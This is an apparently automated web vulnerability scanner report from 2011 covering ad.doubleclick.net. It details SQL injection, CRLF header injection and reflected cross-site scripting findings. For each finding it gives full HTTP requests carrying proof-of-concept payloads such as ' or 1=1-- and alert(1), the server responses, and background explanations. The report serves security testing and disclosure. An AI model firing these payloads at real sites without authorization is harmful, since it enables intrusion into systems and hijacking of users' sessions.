Ad CDN, XSS, Cross Site Scripting, HTTP Header Injection, ad.doubleclick.net

The &PID parameter appears to be vulnerable to SQL injection attacks. The payloads 78613331'%20or%201%3d1--%20 and 78613331'%20or%201%3d2--%20 were each submitted in the &PID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Request 1

GET /adi/N4359.msn.comOX2567/B5091231.144;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/11000000000033118.1?!&&PID=815475078613331'%20or%201%3d1--%20&UIT=G&TargetID=28683750&AN=1662206136&PG=LIFYGB&ASID=f58c59c1bef74d229169f04a72a59f63&destination=;ord=1662206136? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://lifestyle.msn.com/your-life/your-money-today/staticslideshow.aspx?cp-documentid=27521348&gt1=32078
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 18:34:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6235

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1359940/dep_1perc_300x250_35k_s_MSN.swf";
var gif = "http://s0.2mdn.net/1359940/dep_1perc_300x250_20k_j_MSN.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/7/0/%2a/a%3B234345855%3B0-0%3B0%3B57735430%3B4307-300/250%3B39919832/39937619/1%3B%3B%7Esscs%3D%3fhttp://promotions.bankofamerica.com/ccsearchlp4/?code=UABJBO&cm_mmc=Cons-CC-_-MSN-_-dep_1perc_300x250_35k_s_MSN.swf-_-MSN_Partnership_YourMoney_MSNLifestyle_Sponsorship_NA_300x250_Flash__NA_CPM_NA_LifestyleFinance_TBD");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/7/0/%2a/a%3B234345855%3B0-0%3B0%3B57735430%3B4307-300/250%3B39919832/39937619/1%3B%3B%7Esscs%3D%3fhttp://promotions.bankofamerica.com/ccsearchlp4/?code=UABJBO&cm_mmc=Cons-CC-_-MSN-_-dep_1perc_300x250_35k_s_MSN.swf-_-MSN_Partnership_YourMoney_MSNLifestyle_Sponsorship_NA_300x250_Flash__NA_CPM_NA_LifestyleFinance_TBD");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/7/0/%2a/a%3B234345855%3B0-0%3B0%3
...[SNIP]...

Request 2

GET /adi/N4359.msn.comOX2567/B5091231.144;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/11000000000033118.1?!&&PID=815475078613331'%20or%201%3d2--%20&UIT=G&TargetID=28683750&AN=1662206136&PG=LIFYGB&ASID=f58c59c1bef74d229169f04a72a59f63&destination=;ord=1662206136? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://lifestyle.msn.com/your-life/your-money-today/staticslideshow.aspx?cp-documentid=27521348&gt1=32078
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 18:34:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6352

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1359940/dep_swirl_300x250_30k_s_MSN.swf";
var gif = "http://s0.2mdn.net/1359940/dep_swirl_300x250_24k_j_MSN.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/7/0/%2a/a%3B234345855%3B2-0%3B0%3B57735430%3B4307-300/250%3B39920005/39937792/1%3B%3B%7Esscs%3D%3fhttp://learn.bankofamerica.com/products/managing-credit/bankamericard-cash-rewards-credit-card.html?cm_mmc=Cons-CC-_-MSN-_-dep_swirl_300x250_30k_s_MSN.swf-_-MSN_Partnership_YourMoney_MSNLifestyle_Sponsorship_NA_300x250_Flash__NA_CPM_NA_LifestyleFinance_TBD");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/7/0/%2a/a%3B234345855%3B2-0%3B0%3B57735430%3B4307-300/250%3B39920005/39937792/1%3B%3B%7Esscs%3D%3fhttp://learn.bankofamerica.com/products/managing-credit/bankamericard-cash-rewards-credit-card.html?cm_mmc=Cons-CC-_-MSN-_-dep_swirl_300x250_30k_s_MSN.swf-_-MSN_Partnership_YourMoney_MSNLifestyle_Sponsorship_NA_300x250_Flash__NA_CPM_NA_LifestyleFinance_TBD");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("h
...[SNIP]...

2. HTTP header injection previous next
There are 6 instances of this issue:

/ad/N5506.MSN/B5070033.98 [REST URL parameter 1]
/adj/N1243.unilevermsn/B5101540.3 [REST URL parameter 1]
/adj/N3880.advertising.micros/B5109625.39 [REST URL parameter 1]
/adj/fitbie/fittools [REST URL parameter 1]
/adj/fitbie/loseweight [REST URL parameter 1]
/crossdomain.xml [REST URL parameter 1]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

2.1. http://ad.doubleclick.net/ad/N5506.MSN/B5070033.98 [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N5506.MSN/B5070033.98

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6311a%0d%0a07497ab5511 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6311a%0d%0a07497ab5511/N5506.MSN/B5070033.98;sz=1x1;ord=855640902? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blstc.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6311a
07497ab5511/N5506.MSN/B5070033.98;sz=1x1;ord=855640902:
Date: Sun, 13 Feb 2011 14:25:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e006%0d%0ad8ebfffdb0d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e006%0d%0ad8ebfffdb0d/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e006
d8ebfffdb0d/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http: //wrapper.g.msn.com/GRedirect.aspx
Date: Sun, 13 Feb 2011 14:30:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b85e%0d%0a8b0c3bc7db7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b85e%0d%0a8b0c3bc7db7/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b85e
8b0c3bc7db7/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http: //wrapper.g.msn.com/GRedirect.aspx
Date: Sun, 13 Feb 2011 14:45:30 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adj/fitbie/fittools [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fitbie/fittools

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 63cd8%0d%0a7fc5779f6c1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /63cd8%0d%0a7fc5779f6c1/fitbie/fittools;kw=;slot=300x250.1;topic=home;sbtpc=home;tile=1;sz=300x250;ord=123456? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/63cd8
7fc5779f6c1/fitbie/fittools;kw=;slot=300x250.1;topic=home;sbtpc=home;tile=1;sz=300x250;ord=123456:
Date: Sun, 13 Feb 2011 14:24:37 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adj/fitbie/loseweight [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fitbie/loseweight

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3b4ae%0d%0ab93f44d3466 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3b4ae%0d%0ab93f44d3466/fitbie/loseweight;kw=;slot=300x250.1;topic=home;sbtpc=home;tile=1;sz=300x250;ord=123456? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3b4ae
b93f44d3466/fitbie/loseweight;kw=;slot=300x250.1;topic=home;sbtpc=home;tile=1;sz=300x250;ord=123456:
Date: Sun, 13 Feb 2011 14:26:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/crossdomain.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 98db1%0d%0a9a282b94372 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /crossdomain.xml98db1%0d%0a9a282b94372 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/masthead.swf?v1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/crossdomain.xml98db1
9a282b94372:
Date: Fri, 11 Feb 2011 18:16:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected) previous next
There are 80 instances of this issue:

/adj/N1243.unilevermsn/B5101540.3 [&PID parameter]
/adj/N1243.unilevermsn/B5101540.3 [&PID parameter]
/adj/N1243.unilevermsn/B5101540.3 [AN parameter]
/adj/N1243.unilevermsn/B5101540.3 [AN parameter]
/adj/N1243.unilevermsn/B5101540.3 [ASID parameter]
/adj/N1243.unilevermsn/B5101540.3 [ASID parameter]
/adj/N1243.unilevermsn/B5101540.3 [PG parameter]
/adj/N1243.unilevermsn/B5101540.3 [PG parameter]
/adj/N1243.unilevermsn/B5101540.3 [TargetID parameter]
/adj/N1243.unilevermsn/B5101540.3 [TargetID parameter]
/adj/N1243.unilevermsn/B5101540.3 [UIT parameter]
/adj/N1243.unilevermsn/B5101540.3 [UIT parameter]
/adj/N1243.unilevermsn/B5101540.3 [destination parameter]
/adj/N1243.unilevermsn/B5101540.3 [destination parameter]
/adj/N1243.unilevermsn/B5101540.3 [sz parameter]
/adj/N1243.unilevermsn/B5101540.3 [sz parameter]
/adj/N1243.unilevermsn/B5101540.4 [&PID parameter]
/adj/N1243.unilevermsn/B5101540.4 [&PID parameter]
/adj/N1243.unilevermsn/B5101540.4 [AN parameter]
/adj/N1243.unilevermsn/B5101540.4 [AN parameter]
/adj/N1243.unilevermsn/B5101540.4 [ASID parameter]
/adj/N1243.unilevermsn/B5101540.4 [ASID parameter]
/adj/N1243.unilevermsn/B5101540.4 [PG parameter]
/adj/N1243.unilevermsn/B5101540.4 [PG parameter]
/adj/N1243.unilevermsn/B5101540.4 [TargetID parameter]
/adj/N1243.unilevermsn/B5101540.4 [TargetID parameter]
/adj/N1243.unilevermsn/B5101540.4 [UIT parameter]
/adj/N1243.unilevermsn/B5101540.4 [UIT parameter]
/adj/N1243.unilevermsn/B5101540.4 [destination parameter]
/adj/N1243.unilevermsn/B5101540.4 [destination parameter]
/adj/N1243.unilevermsn/B5101540.4 [sz parameter]
/adj/N1243.unilevermsn/B5101540.4 [sz parameter]
/adj/N3740.MSN/B5123771.2 [&PID parameter]
/adj/N3740.MSN/B5123771.2 [&PID parameter]
/adj/N3740.MSN/B5123771.2 [AN parameter]
/adj/N3740.MSN/B5123771.2 [AN parameter]
/adj/N3740.MSN/B5123771.2 [ASID parameter]
/adj/N3740.MSN/B5123771.2 [ASID parameter]
/adj/N3740.MSN/B5123771.2 [PG parameter]
/adj/N3740.MSN/B5123771.2 [PG parameter]
/adj/N3740.MSN/B5123771.2 [TargetID parameter]
/adj/N3740.MSN/B5123771.2 [TargetID parameter]
/adj/N3740.MSN/B5123771.2 [UIT parameter]
/adj/N3740.MSN/B5123771.2 [UIT parameter]
/adj/N3740.MSN/B5123771.2 [destination parameter]
/adj/N3740.MSN/B5123771.2 [destination parameter]
/adj/N3740.MSN/B5123771.2 [sz parameter]
/adj/N3740.MSN/B5123771.2 [sz parameter]
/adj/N3880.advertising.micros/B5109625.37 [&PID parameter]
/adj/N3880.advertising.micros/B5109625.37 [&PID parameter]
/adj/N3880.advertising.micros/B5109625.37 [AN parameter]
/adj/N3880.advertising.micros/B5109625.37 [AN parameter]
/adj/N3880.advertising.micros/B5109625.37 [ASID parameter]
/adj/N3880.advertising.micros/B5109625.37 [ASID parameter]
/adj/N3880.advertising.micros/B5109625.37 [PG parameter]
/adj/N3880.advertising.micros/B5109625.37 [PG parameter]
/adj/N3880.advertising.micros/B5109625.37 [TargetID parameter]
/adj/N3880.advertising.micros/B5109625.37 [TargetID parameter]
/adj/N3880.advertising.micros/B5109625.37 [UIT parameter]
/adj/N3880.advertising.micros/B5109625.37 [UIT parameter]
/adj/N3880.advertising.micros/B5109625.37 [dcove parameter]
/adj/N3880.advertising.micros/B5109625.37 [dcove parameter]
/adj/N3880.advertising.micros/B5109625.37 [destination parameter]
/adj/N3880.advertising.micros/B5109625.37 [destination parameter]
/adj/N3880.advertising.micros/B5109625.39 [&PID parameter]
/adj/N3880.advertising.micros/B5109625.39 [&PID parameter]
/adj/N3880.advertising.micros/B5109625.39 [AN parameter]
/adj/N3880.advertising.micros/B5109625.39 [AN parameter]
/adj/N3880.advertising.micros/B5109625.39 [ASID parameter]
/adj/N3880.advertising.micros/B5109625.39 [ASID parameter]
/adj/N3880.advertising.micros/B5109625.39 [PG parameter]
/adj/N3880.advertising.micros/B5109625.39 [PG parameter]
/adj/N3880.advertising.micros/B5109625.39 [TargetID parameter]
/adj/N3880.advertising.micros/B5109625.39 [TargetID parameter]
/adj/N3880.advertising.micros/B5109625.39 [UIT parameter]
/adj/N3880.advertising.micros/B5109625.39 [UIT parameter]
/adj/N3880.advertising.micros/B5109625.39 [dcove parameter]
/adj/N3880.advertising.micros/B5109625.39 [dcove parameter]
/adj/N3880.advertising.micros/B5109625.39 [destination parameter]
/adj/N3880.advertising.micros/B5109625.39 [destination parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

3.1. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eb9b"-alert(1)-"36fac6f43fc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=83522511eb9b"-alert(1)-"36fac6f43fc&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:26:31 GMT
Expires: Sun, 13 Feb 2011 14:31:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6823

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
024/SF_SnackBar_300x250_bkup.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=83522511eb9b"-alert(1)-"36fac6f43fc&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B1-0%3B0%3B59899979%3B4307-300/2
...[SNIP]...

3.2. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48428'-alert(1)-'fed52c6ac08 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=835225148428'-alert(1)-'fed52c6ac08&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
